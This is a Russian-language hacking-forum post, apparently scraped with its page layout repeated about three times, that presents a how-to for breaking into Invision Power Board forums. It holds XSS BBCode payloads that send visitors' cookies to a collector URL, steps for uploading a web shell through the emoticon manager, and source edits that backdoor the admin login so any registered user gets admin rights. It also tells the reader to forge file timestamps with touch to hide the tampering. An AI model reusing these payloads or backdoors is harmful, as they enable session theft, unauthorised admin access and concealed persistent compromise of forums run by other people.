Последний раз редактировалось Azazel, 09.05.2006 в 01:33.
qBiN
Посмотреть профиль
Репутация
Отправить персональное сообщение для qBiN
Отправить E-mail для qBiN
Посетить домашнюю страницу qBiN
Найти все сообщения от qBiN
Добавить qBiN в список друзей
« Предыдущая тема | Следующая тема »
Опции темы
Версия для печати
Отправить на E-mail
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой теме
Вы уже оценили эту тему
Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения
--------------------------------------------------------------------------------
BB-коды Вкл.
Смайлики Вкл.
[img] код Вкл.
HTML код Выкл.
Быстрый переход
Выберите Панель управления Персональные сообщения Подписки Кто в Онлайне Поиск на форуме Главная страница форума -------------------- ENGLISH ZONE Forum for discussion of ANTICHAT ОСНОВНОЙ Новости Избранное Статьи Наши Статьи Чужие Статьи Уязвимости чатов Уязвимости форумов Расшифровка паролей E-Mail ICQ Продажа ICQ PHP, PERL, MySQL, JavaScript. ПО для web разработчика Безопасность WEB - приложений. Обсуждение Ваших сайтов XSS, SQL, Инъекции. Уязвимости, найденные вами. Безопасность в сети Анонимность Защита ОС: вирусы, антивирусы, файрвелы. БЕЗОПАСНОСТЬ - СЕРВЕРА LINUX, FREEBSD. Soft - Unix WINDOWS Soft - Windows Delphi, С/С++, C# АнтиАдмин БЕЗОПАСНОСТЬ - ДРУГОЕ Исследование программного обеспечения\реверсинг Crackmes Статьи Электроника и Фрикинг Ссылки Новостной фрик Сотовый фрикинг Железо Схемы и программы Телефония и связь ОФФТОП Болталка Развлечения Antichat's Quest On-line игры и другие. Уязвимости. Коды. Флейм Покупка, Продажа, Обмен, Раздача. Продажа ICQ Объявления Просьбы о взломах О Работе О ФОРУМЕ И САЙТЕ Правила форума. Обсуждения и добавления. Предложения по развитию сайта Запросы на исправление рейтингов Video.antichat.ru Комментарии к видео.
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей phpBB] qBiN Уязвимости форумов 3 Вчера 01:46
Секреты быстрой раскрутки сайта Foto.ru - крупнейший интернет-магазин фототехники. Фотоаппараты и фотокамеры Canon, Nikon, Casio, Olympus, Pentax. Зарегистрируй себе домен RU
[AD]
реклама на форуме
Powered by: vBulletin Version 3.0.7
Copyright ©2000 - 2006, Jelsoft Enterprises Ltd.
- Группа Members of Antichat
- Группа Модераторы
- Группа Супермодераторы
- Группа Green
- Группа Администраторов.
(Ñ) ANTICHAT.RU
ANTICHAT.RU VIDEO.ANTICHAT.RU НОВЫЕ СООБЩЕНИЯ ФОРУМ
Форум АНТИЧАТ > ОСНОВНОЙ > Уязвимости форумов
[Обзор уязвимостей Ipb]
Поиск на форуме
Расширенный поиск
Опции темы Поиск в этой теме Опции просмотра
[Обзор уязвимостей Ipb]
#1 09.03.2006, 20:13
qBiN
♥ Злой модератор ♥
Регистрация: 20.01.2005
Адрес: in.debug-mode
Сообщения: 881
Провел на форуме:
2 недели 2 дней 14 Часов
Репутация: Эксперт (113) ±
[Обзор уязвимостей Ipb]
--------------------------------------------------------------------------------
Хочется сразу сказать что почти все в этой "статье" принадлежит k1b0rg'у , но из-за флуда некоторых товарищей тема была пропущена мною, и вот она возраждается благодаря челу под ником Nova,который немного подправил эту "статью".Ну и конечно qBiN подредактировав,раскрасив,дав несколько советов пустил в печать
Определение версии форума
Версия Invision Power Board 1.3
Определяеться присутствием папок и файлов:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
присутсвтуют файлы
ssi.php
show.php
css.php
conf_mime_types.php
Версия Invision Power Board 2.0.*
Определяеться присутствием папок и файлов:
/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: Invision Power Board -> Forbidden
Версия Invision Power Board 2.1.*
Определяеться присутствием папок и файлов:
/ips_kernel/PEAR/
присутствует файлы:
info.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: IBForums-> Forbidden
Exploits
Версия Invision Power Board 1.3.1 http://milw0rm.com/id.php?id=1036
Версия Invision Power Board 1.* , 2.* (<2.0.4) http://rst.void.ru/download/r57ipb2.txt
Версия Invision Power Board 2.0.0 - 2.0.2 http://milw0rm.com/id.php?id=648
Версия Invision Power Board Army System Mod 2.1 http://www.milw0rm.com/exploits/1492
Версия Invision Power Board 2.1.4 (Dos) http://www.milw0rm.com/id.php?id=1489
Версия Invision Power Board <=2.1.5 (Remote code execution)
http://forum.antichat.ru/thread18222.html
XSS Используем указаные коды без знака * он присутствует чтоб данные коды не сработали на этом форуме.
Код:
[ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor]` style=`backg*round:url(javascript:docu*ment.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
Код:
[EMA*IL]mail@mail.com[U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]Код:
[po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]
Код:
[em*ail]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/img]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
Код:
[еm*ail]wj@wj.com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`Код:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
Заливаем шелл
Invision Power Board 1.3
"Administration(Администрирование)"->"Manage Emoticons(Управление смайлами)"->"Upload an Emoticon to the emoticons directory(Загрузить смайл в его директорию)"->"Browse(Обзор)"
Обычно шелл грузица в одну из этих папок,в зависимости от версии,если конечно прав хватает
1.3 /forum/html/emoticons/shell.php
2.* /forum/style_emoticons/default/shell.php
где shell.php имя вашего загруженного шелла.
Invision Power Board 2.0.*
Троянизация форума
А теперь представим такую ситуацию, что ты месяц ломал форум, залил шелл, и бац, его удалили =)печально, конечно, да! Для этого мы будем "троянить" форум ,т.е. изменять исходный код форума на тот который сделает нас админом, даже если мы им не являемся. Т.е. любой рарегестрированный пользователь сможет стать админом, но в админцентре, что ты админ не будет отображаться И врядли админы будут смотреть исходники страниц, т.е. твой "троян" будет еще долгое время висеть на форуме чуешь? итак начнем.
ищем такие строки (по дефолту 382 строчка)
Invision Power Board 1.3
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
$session_validated = 1;
$this_session = $row;
}
и заменяем на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
$session_validated = 1;
$this_session = $row;
}
и ищим строчки (по дефолту 442 строчка)
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
заменяем соотвественно на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
потом редактируем файл /sources/Admin/ad_mysql.php и удаляем строки
Код:
if ($MEMBER['mgroup'] != $INFO['admin_group'])
{
$ADMIN->error("Sorry, these functions are for the root admin group only");
}
Invision Power Board 2.0.*
/sources/action_admin/login.php
по дефолту 147 строчка
удаляем строки
Код:
if ($mem['g_access_cp'] != 1)
{
$this->login_form("You do not have access to the administrative CP");
}
else
{
и в строке (по дефолту 206) удаляем символ "}" естественно без кавычек.
sql.php по дефолту 46 строка:
удаляем
Код:
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
потом идем сюда
/sources/lib/admin_functions.php (строка 262)
изменяем строку:
Код:
$this->ipsclass->admin_session['_session_validated'] = 0;
меняем на
Код:
$this->ipsclass->admin_session['_session_validated'] = 1;
потом удаляем строки в файле /sources/sql_mysql.php (по дефолту 76 строка)
[code]
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
[code]
А терь объясню все поподробней, когда ты заходишь в админку(не "затрояненную"), то идет сначала проверка if ($GROUP['g_access_cp'] != 1) имеешь ли ты доступ к админке, если нет {
do_login("You do not have access to the administrative CP");
}
то пишеться что ты болван, если же имеешь пропускает дальше. Для того чтобы нас приняли за своего надо изменить как ты понял эту строку if ($GROUP['g_access_cp'] != 1) на if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 ) этим мы ей даем понять, если мы имеем доступ к админке, или не имеем, все равно нас пропустить. Знающие легко переделают код под себя, как им хочеться, впишут что хотят, но т.к. как статья расчитывалась для начинающих, то я думаю, что вам так понятней будет. Ну вот, самые важные аспекты я разобрал, если что непонятное спрашивайте. Указанный выше приём, сработал в 9/10 форумов. В десятом были поставлены права правильно, отсюда следует, что почти каждый форум уязвим. ТОЛЬКО НЕ ЗАБЫАЕМ ИЗМЕНЯТЬ ДАТУ изменения файла, командой
touch -t 200310240921
где 2003 год 10 месяц 24 число 09:21 часов
советую изначально посмотреть эту дату перед трояниваем, чтобы поставить точно такую же.
__________________
--------------------------------------------------------------------------------
Последний раз редактировалось Azazel, 09.05.2006 в 01:33.
qBiN
Посмотреть профиль
Репутация
Отправить персональное сообщение для qBiN
Отправить E-mail для qBiN
Посетить домашнюю страницу qBiN
Найти все сообщения от qBiN
Добавить qBiN в список друзей
« Предыдущая тема | Следующая тема »
Опции темы
Версия для печати
Отправить на E-mail
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой теме
Вы уже оценили эту тему
Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения
--------------------------------------------------------------------------------
BB-коды Вкл.
Смайлики Вкл.
[img] код Вкл.
HTML код Выкл.
Быстрый переход
Выберите Панель управления Персональные сообщения Подписки Кто в Онлайне Поиск на форуме Главная страница форума -------------------- ENGLISH ZONE Forum for discussion of ANTICHAT ОСНОВНОЙ Новости Избранное Статьи Наши Статьи Чужие Статьи Уязвимости чатов Уязвимости форумов Расшифровка паролей E-Mail ICQ Продажа ICQ PHP, PERL, MySQL, JavaScript. ПО для web разработчика Безопасность WEB - приложений. Обсуждение Ваших сайтов XSS, SQL, Инъекции. Уязвимости, найденные вами. Безопасность в сети Анонимность Защита ОС: вирусы, антивирусы, файрвелы. БЕЗОПАСНОСТЬ - СЕРВЕРА LINUX, FREEBSD. Soft - Unix WINDOWS Soft - Windows Delphi, С/С++, C# АнтиАдмин БЕЗОПАСНОСТЬ - ДРУГОЕ Исследование программного обеспечения\реверсинг Crackmes Статьи Электроника и Фрикинг Ссылки Новостной фрик Сотовый фрикинг Железо Схемы и программы Телефония и связь ОФФТОП Болталка Развлечения Antichat's Quest On-line игры и другие. Уязвимости. Коды. Флейм Покупка, Продажа, Обмен, Раздача. Продажа ICQ Объявления Просьбы о взломах О Работе О ФОРУМЕ И САЙТЕ Правила форума. Обсуждения и добавления. Предложения по развитию сайта Запросы на исправление рейтингов Video.antichat.ru Комментарии к видео.
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей phpBB] qBiN Уязвимости форумов 3 Вчера 01:46
Секреты быстрой раскрутки сайта Foto.ru - крупнейший интернет-магазин фототехники. Фотоаппараты и фотокамеры Canon, Nikon, Casio, Olympus, Pentax. Зарегистрируй себе домен RU
[AD]
реклама на форуме
Powered by: vBulletin Version 3.0.7
Copyright ©2000 - 2006, Jelsoft Enterprises Ltd.
- Группа Members of Antichat
- Группа Модераторы
- Группа Супермодераторы
- Группа Green
- Группа Администраторов.
(Ñ) ANTICHAT.RU
ANTICHAT.RU VIDEO.ANTICHAT.RU НОВЫЕ СООБЩЕНИЯ ФОРУМ
Форум АНТИЧАТ > ОСНОВНОЙ > Уязвимости форумов
[Обзор уязвимостей Ipb]
Поиск на форуме
Расширенный поиск
Опции темы Поиск в этой теме Опции просмотра
[Обзор уязвимостей Ipb]
#1 09.03.2006, 20:13
qBiN
♥ Злой модератор ♥
Регистрация: 20.01.2005
Адрес: in.debug-mode
Сообщения: 881
Провел на форуме:
2 недели 2 дней 14 Часов
Репутация: Эксперт (113) ±
[Обзор уязвимостей Ipb]
--------------------------------------------------------------------------------
Хочется сразу сказать что почти все в этой "статье" принадлежит k1b0rg'у , но из-за флуда некоторых товарищей тема была пропущена мною, и вот она возраждается благодаря челу под ником Nova,который немного подправил эту "статью".Ну и конечно qBiN подредактировав,раскрасив,дав несколько советов пустил в печать
Определение версии форума
Версия Invision Power Board 1.3
Определяеться присутствием папок и файлов:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
присутсвтуют файлы
ssi.php
show.php
css.php
conf_mime_types.php
Версия Invision Power Board 2.0.*
Определяеться присутствием папок и файлов:
/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: Invision Power Board -> Forbidden
Версия Invision Power Board 2.1.*
Определяеться присутствием папок и файлов:
/ips_kernel/PEAR/
присутствует файлы:
info.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: IBForums-> Forbidden
Exploits
Версия Invision Power Board 1.3.1 http://milw0rm.com/id.php?id=1036
Версия Invision Power Board 1.* , 2.* (<2.0.4) http://rst.void.ru/download/r57ipb2.txt
Версия Invision Power Board 2.0.0 - 2.0.2 http://milw0rm.com/id.php?id=648
Версия Invision Power Board Army System Mod 2.1 http://www.milw0rm.com/exploits/1492
Версия Invision Power Board 2.1.4 (Dos) http://www.milw0rm.com/id.php?id=1489
Версия Invision Power Board <=2.1.5 (Remote code execution)
http://forum.antichat.ru/thread18222.html
XSS Используем указаные коды без знака * он присутствует чтоб данные коды не сработали на этом форуме.
Код:
[ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor]` style=`backg*round:url(javascript:docu*ment.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
Код:
[EMA*IL]mail@mail.com[U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]Код:
[po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]
Код:
[em*ail]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/img]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
Код:
[еm*ail]wj@wj.com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`Код:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
Заливаем шелл
Invision Power Board 1.3
"Administration(Администрирование)"->"Manage Emoticons(Управление смайлами)"->"Upload an Emoticon to the emoticons directory(Загрузить смайл в его директорию)"->"Browse(Обзор)"
Обычно шелл грузица в одну из этих папок,в зависимости от версии,если конечно прав хватает
1.3 /forum/html/emoticons/shell.php
2.* /forum/style_emoticons/default/shell.php
где shell.php имя вашего загруженного шелла.
Invision Power Board 2.0.*
Троянизация форума
А теперь представим такую ситуацию, что ты месяц ломал форум, залил шелл, и бац, его удалили =)печально, конечно, да! Для этого мы будем "троянить" форум ,т.е. изменять исходный код форума на тот который сделает нас админом, даже если мы им не являемся. Т.е. любой рарегестрированный пользователь сможет стать админом, но в админцентре, что ты админ не будет отображаться И врядли админы будут смотреть исходники страниц, т.е. твой "троян" будет еще долгое время висеть на форуме чуешь? итак начнем.
ищем такие строки (по дефолту 382 строчка)
Invision Power Board 1.3
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
$session_validated = 1;
$this_session = $row;
}
и заменяем на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
$session_validated = 1;
$this_session = $row;
}
и ищим строчки (по дефолту 442 строчка)
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
заменяем соотвественно на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
потом редактируем файл /sources/Admin/ad_mysql.php и удаляем строки
Код:
if ($MEMBER['mgroup'] != $INFO['admin_group'])
{
$ADMIN->error("Sorry, these functions are for the root admin group only");
}
Invision Power Board 2.0.*
/sources/action_admin/login.php
по дефолту 147 строчка
удаляем строки
Код:
if ($mem['g_access_cp'] != 1)
{
$this->login_form("You do not have access to the administrative CP");
}
else
{
и в строке (по дефолту 206) удаляем символ "}" естественно без кавычек.
sql.php по дефолту 46 строка:
удаляем
Код:
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
потом идем сюда
/sources/lib/admin_functions.php (строка 262)
изменяем строку:
Код:
$this->ipsclass->admin_session['_session_validated'] = 0;
меняем на
Код:
$this->ipsclass->admin_session['_session_validated'] = 1;
потом удаляем строки в файле /sources/sql_mysql.php (по дефолту 76 строка)
[code]
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
[code]
А терь объясню все поподробней, когда ты заходишь в админку(не "затрояненную"), то идет сначала проверка if ($GROUP['g_access_cp'] != 1) имеешь ли ты доступ к админке, если нет {
do_login("You do not have access to the administrative CP");
}
то пишеться что ты болван, если же имеешь пропускает дальше. Для того чтобы нас приняли за своего надо изменить как ты понял эту строку if ($GROUP['g_access_cp'] != 1) на if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 ) этим мы ей даем понять, если мы имеем доступ к админке, или не имеем, все равно нас пропустить. Знающие легко переделают код под себя, как им хочеться, впишут что хотят, но т.к. как статья расчитывалась для начинающих, то я думаю, что вам так понятней будет. Ну вот, самые важные аспекты я разобрал, если что непонятное спрашивайте. Указанный выше приём, сработал в 9/10 форумов. В десятом были поставлены права правильно, отсюда следует, что почти каждый форум уязвим. ТОЛЬКО НЕ ЗАБЫАЕМ ИЗМЕНЯТЬ ДАТУ изменения файла, командой
touch -t 200310240921
где 2003 год 10 месяц 24 число 09:21 часов
советую изначально посмотреть эту дату перед трояниваем, чтобы поставить точно такую же.
__________________
--------------------------------------------------------------------------------
Последний раз редактировалось Azazel, 09.05.2006 в 01:33.
qBiN
Посмотреть профиль
Репутация
Отправить персональное сообщение для qBiN
Отправить E-mail для qBiN
Посетить домашнюю страницу qBiN
Найти все сообщения от qBiN
Добавить qBiN в список друзей
« Предыдущая тема | Следующая тема »
Опции темы
Версия для печати
Отправить на E-mail
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой теме
Вы уже оценили эту тему
Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения
--------------------------------------------------------------------------------
BB-коды Вкл.
Смайлики Вкл.
[img] код Вкл.
HTML код Выкл.
Быстрый переход
Выберите Панель управления Персональные сообщения Подписки Кто в Онлайне Поиск на форуме Главная страница форума -------------------- ENGLISH ZONE Forum for discussion of ANTICHAT ОСНОВНОЙ Новости Избранное Статьи Наши Статьи Чужие Статьи Уязвимости чатов Уязвимости форумов Расшифровка паролей E-Mail ICQ Продажа ICQ PHP, PERL, MySQL, JavaScript. ПО для web разработчика Безопасность WEB - приложений. Обсуждение Ваших сайтов XSS, SQL, Инъекции. Уязвимости, найденные вами. Безопасность в сети Анонимность Защита ОС: вирусы, антивирусы, файрвелы. БЕЗОПАСНОСТЬ - СЕРВЕРА LINUX, FREEBSD. Soft - Unix WINDOWS Soft - Windows Delphi, С/С++, C# АнтиАдмин БЕЗОПАСНОСТЬ - ДРУГОЕ Исследование программного обеспечения\реверсинг Crackmes Статьи Электроника и Фрикинг Ссылки Новостной фрик Сотовый фрикинг Железо Схемы и программы Телефония и связь ОФФТОП Болталка Развлечения Antichat's Quest On-line игры и другие. Уязвимости. Коды. Флейм Покупка, Продажа, Обмен, Раздача. Продажа ICQ Объявления Просьбы о взломах О Работе О ФОРУМЕ И САЙТЕ Правила форума. Обсуждения и добавления. Предложения по развитию сайта Запросы на исправление рейтингов Video.antichat.ru Комментарии к видео.
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей phpBB] qBiN Уязвимости форумов 3 Вчера 01:46
Секреты быстрой раскрутки сайта Foto.ru - крупнейший интернет-магазин фототехники. Фотоаппараты и фотокамеры Canon, Nikon, Casio, Olympus, Pentax. Зарегистрируй себе домен RU
[AD]
реклама на форуме
Powered by: vBulletin Version 3.0.7
Copyright ©2000 - 2006, Jelsoft Enterprises Ltd.
- Группа Members of Antichat
- Группа Модераторы
- Группа Супермодераторы
- Группа Green
- Группа Администраторов.
(Ñ) ANTICHAT.RU
ANTICHAT.RU VIDEO.ANTICHAT.RU НОВЫЕ СООБЩЕНИЯ ФОРУМ
Форум АНТИЧАТ > ОСНОВНОЙ > Уязвимости форумов
[Обзор уязвимостей Ipb]
Поиск на форуме
Расширенный поиск
Опции темы Поиск в этой теме Опции просмотра
[Обзор уязвимостей Ipb]
#1 09.03.2006, 20:13
qBiN
♥ Злой модератор ♥
Регистрация: 20.01.2005
Адрес: in.debug-mode
Сообщения: 881
Провел на форуме:
2 недели 2 дней 14 Часов
Репутация: Эксперт (113) ±
[Обзор уязвимостей Ipb]
--------------------------------------------------------------------------------
Хочется сразу сказать что почти все в этой "статье" принадлежит k1b0rg'у , но из-за флуда некоторых товарищей тема была пропущена мною, и вот она возраждается благодаря челу под ником Nova,который немного подправил эту "статью".Ну и конечно qBiN подредактировав,раскрасив,дав несколько советов пустил в печать
Определение версии форума
Версия Invision Power Board 1.3
Определяеться присутствием папок и файлов:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
присутсвтуют файлы
ssi.php
show.php
css.php
conf_mime_types.php
Версия Invision Power Board 2.0.*
Определяеться присутствием папок и файлов:
/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: Invision Power Board -> Forbidden
Версия Invision Power Board 2.1.*
Определяеться присутствием папок и файлов:
/ips_kernel/PEAR/
присутствует файлы:
info.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: IBForums-> Forbidden
Exploits
Версия Invision Power Board 1.3.1 http://milw0rm.com/id.php?id=1036
Версия Invision Power Board 1.* , 2.* (<2.0.4) http://rst.void.ru/download/r57ipb2.txt
Версия Invision Power Board 2.0.0 - 2.0.2 http://milw0rm.com/id.php?id=648
Версия Invision Power Board Army System Mod 2.1 http://www.milw0rm.com/exploits/1492
Версия Invision Power Board 2.1.4 (Dos) http://www.milw0rm.com/id.php?id=1489
Версия Invision Power Board <=2.1.5 (Remote code execution)
http://forum.antichat.ru/thread18222.html
XSS Используем указаные коды без знака * он присутствует чтоб данные коды не сработали на этом форуме.
Код:
[ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor]` style=`backg*round:url(javascript:docu*ment.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
Код:
[EMA*IL]mail@mail.com[U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]Код:
[po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]
Код:
[em*ail]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/img]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
Код:
[еm*ail]wj@wj.com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Код:
[EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`Код:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
Заливаем шелл
Invision Power Board 1.3
"Administration(Администрирование)"->"Manage Emoticons(Управление смайлами)"->"Upload an Emoticon to the emoticons directory(Загрузить смайл в его директорию)"->"Browse(Обзор)"
Обычно шелл грузица в одну из этих папок,в зависимости от версии,если конечно прав хватает
1.3 /forum/html/emoticons/shell.php
2.* /forum/style_emoticons/default/shell.php
где shell.php имя вашего загруженного шелла.
Invision Power Board 2.0.*
Троянизация форума
А теперь представим такую ситуацию, что ты месяц ломал форум, залил шелл, и бац, его удалили =)печально, конечно, да! Для этого мы будем "троянить" форум ,т.е. изменять исходный код форума на тот который сделает нас админом, даже если мы им не являемся. Т.е. любой рарегестрированный пользователь сможет стать админом, но в админцентре, что ты админ не будет отображаться И врядли админы будут смотреть исходники страниц, т.е. твой "троян" будет еще долгое время висеть на форуме чуешь? итак начнем.
ищем такие строки (по дефолту 382 строчка)
Invision Power Board 1.3
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
$session_validated = 1;
$this_session = $row;
}
и заменяем на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
$session_validated = 1;
$this_session = $row;
}
и ищим строчки (по дефолту 442 строчка)
Код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
заменяем соотвественно на
Код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------
$sess_id = md5( uniqid( microtime() ) );
потом редактируем файл /sources/Admin/ad_mysql.php и удаляем строки
Код:
if ($MEMBER['mgroup'] != $INFO['admin_group'])
{
$ADMIN->error("Sorry, these functions are for the root admin group only");
}
Invision Power Board 2.0.*
/sources/action_admin/login.php
по дефолту 147 строчка
удаляем строки
Код:
if ($mem['g_access_cp'] != 1)
{
$this->login_form("You do not have access to the administrative CP");
}
else
{
и в строке (по дефолту 206) удаляем символ "}" естественно без кавычек.
sql.php по дефолту 46 строка:
удаляем
Код:
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
потом идем сюда
/sources/lib/admin_functions.php (строка 262)
изменяем строку:
Код:
$this->ipsclass->admin_session['_session_validated'] = 0;
меняем на
Код:
$this->ipsclass->admin_session['_session_validated'] = 1;
потом удаляем строки в файле /sources/sql_mysql.php (по дефолту 76 строка)
[code]
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
[code]
А терь объясню все поподробней, когда ты заходишь в админку(не "затрояненную"), то идет сначала проверка if ($GROUP['g_access_cp'] != 1) имеешь ли ты доступ к админке, если нет {
do_login("You do not have access to the administrative CP");
}
